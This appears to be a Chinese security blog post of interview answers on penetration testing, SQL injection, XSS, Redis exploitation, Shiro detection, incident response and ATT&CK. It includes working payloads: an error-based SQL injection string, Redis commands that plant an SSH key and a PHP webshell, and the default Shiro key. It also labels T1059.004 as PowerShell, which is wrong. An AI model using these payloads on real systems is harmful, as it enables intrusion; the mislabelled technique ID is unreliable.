安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
2. 滲透測試流程 & 內網滲透經驗
3. SQL注入報錯利用
4. XSS利用(反射型/DOM型)
5. Redis未授權利用
6. 應急響應流程(無安全設備場景)
7. 手動檢測Shiro反序列化漏洞
8. 漏洞研究與開發能力
9. Hook技術理解
10. ATT&CK框架應用深度
2、滲透測試流程,有沒有打過內網 3、SQL注入,報錯 4、XSS,反射/DOM型,怎么利用 5、Redis的利用 6、應急響應能力怎么樣,處置流程思路 7、無態勢感知,安全設備,怎樣手動發現shiro反序列化漏洞進來都攻擊 8、平時有分析研究漏洞嗎,編寫exp,熟悉什么開發語言 9、關于hook了解 10、ATT&CK框架了解嗎、到什么程度,是否有過應用
2. 滲透測試流程 & 內網滲透經驗
滲透測試標準流程 (PTES框架精簡版):
- 情報收集:資產探測(域名/端口/服務)、員工信息、供應鏈漏洞
- 威脅建模:確定高價值目標(數據庫、域控)、繪制攻擊路徑
- 漏洞分析:自動化掃描 + 手動驗證(避免誤報)
- 滲透利用:獲取初始立足點 → 權限提升 → 橫向移動
- 后滲透:敏感數據定位、權限維持(后門/黃金票據)、痕跡清理
- 報告輸出:風險評級、漏洞復現步驟、修復方案
內網滲透實戰要點:
- ?? 打點案例:通過Web應用漏洞(如Spring Boot Actuator未授權)進入內網
- ?? 橫向移動:
- 協議利用:NTLM Relay攻擊、SMB爆破/MS17-010
- 憑據竊取:Mimikatz提取密碼、Kerberoasting攻擊SPN賬戶
- ?? 域控突破:利用AD組策略漏洞(GPP密碼解密)、ZeroLogon (CVE-2020-1472)
- ?? 隱蔽隧道:DNS/ICMP隧道繞過網絡監控,使用Chisel進行端口轉發
3. SQL注入報錯利用
報錯注入核心原理:觸發數據庫強制報錯,使錯誤信息包含查詢結果
經典Payload示例:sql
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)--
關鍵利用場景:
- 數據庫版本識別:
@@version
- 數據提取:
CONCAT((SELECT user()),0x3a,...)
- 文件讀取:
LOAD_FILE('/etc/passwd')
(需FILE權限)- OOB外帶數據:結合
DNS
查詢(如Oracle的UTL_HTTP)
4. XSS利用(反射型/DOM型)
類型 利用場景 實戰案例 反射型 釣魚攻擊、Cookie劫持 偽造登錄頁誘導用戶提交憑證 DOM型 前端框架漏洞(如AngularJS沙箱逃逸) 修改客戶端代碼繞過安全檢測 高級利用技巧:
- CORS繞過:利用信任域發起跨域請求竊取數據
- 結合CSRF:觸發敏感操作(如修改密碼)
- 瀏覽器漏洞:配合BeEF框架利用瀏覽器0day(如CVE-2023-3079)
5. Redis未授權利用
四大攻擊路徑:
- 寫入SSH公鑰
bash
redis-cli -h 目標IP flushall redis-cli -h 目標IP set payload "公鑰內容" redis-cli -h 目標IP config set dir /root/.ssh/ redis-cli -h 目標IP config set dbfilename authorized_keys
- Webshell寫入
redis
config set dir /var/www/html config set dbfilename shell.php set x "<?php system($_GET['cmd']);?>" save
- 主從復制RCE:利用模塊如RedisRogue
- Crontab定時任務:寫入反彈Shell腳本
6. 應急響應流程(無安全設備場景)
處置四步法:
- 快速隔離:
- 拔網線 > 防火墻阻斷 > 關機(權衡業務影響)
- 痕跡固定:
- 內存鏡像(Volatility)
- 磁盤快照(dd / FTK Imager)
- 入侵溯源:
- 重點檢查:計劃任務、啟動項、異常進程(
ps -aux | grep可疑名
)- 日志分析:
bash
grep -E 'Accepted|Failed' /var/log/auth.log # SSH登錄審計 journalctl -u sshd --since "2 hours ago" # 時間范圍檢索
- 恢復加固:
- 重置所有憑證(包括服務賬戶)
- 修補漏洞(參考MITRE CVE數據庫)
7. 手動檢測Shiro反序列化漏洞
無設備條件下的三步排查法:
- 特征識別:
- 檢查Cookie中是否存在
rememberMe=deleteMe
- 觀察HTTP響應頭中的
Set-Cookie: rememberMe=...
- 密鑰爆破:
- 使用工具ShiroAttack2 爆破常見密鑰(kPH+bIxk5D2deZiIxcaaaA==)
- 流量分析:
- Wireshark過濾特征:
TCP contains "rememberMe"
- 檢測異常Java序列化流頭:
aced 0005
(Hex)
8. 漏洞研究與開發能力
- 研究方向:重點跟蹤Java生態漏洞(Spring/Log4j2)、云原生漏洞(K8s提權)
- EXP開發:
- 語言:Python(POC框架)、Go(高并發利用)、Java(內存馬注入)
- 案例:曾復現Apache Dubbo CVE-2023-23638并編寫RCE利用腳本
- 工具貢獻:提交PR修復Sqlmap中Shiro密鑰檢測模塊的誤報問題
9. Hook技術理解
安全領域的Hook應用:
類型 實現方式 防御對抗用途 用戶態 Detours(Windows API劫持) 監控敏感API調用(如WriteProcessMemory) 內核態 SSDT Hook(Windows) 隱藏進程/端口 瀏覽器 Chrome擴展(manifest V3) 檢測惡意JS執行鏈 實戰案例:
- 使用Frida框架Hook Android應用SSL證書驗證函數繞過雙向認證
10. ATT&CK框架應用深度
掌握程度:
- 矩陣映射:在報告中標注攻擊技術ID(如T1059.004 - PowerShell)
- 戰術應用:
- 紅隊:基于TA0008(橫向移動)設計域滲透路徑
- 藍隊:針對T1547.001(注冊表自啟動)部署EDR檢測規則
項目實踐:
- 利用ATT&CK Navigator設計企業威脅覆蓋熱力圖
- 將蜜罐捕獲的攻擊行為映射到TTPs(如APT29常用T1078.004 - 云賬戶)
- 開發自動化工具關聯Sigma規則與ATT&CK技術編號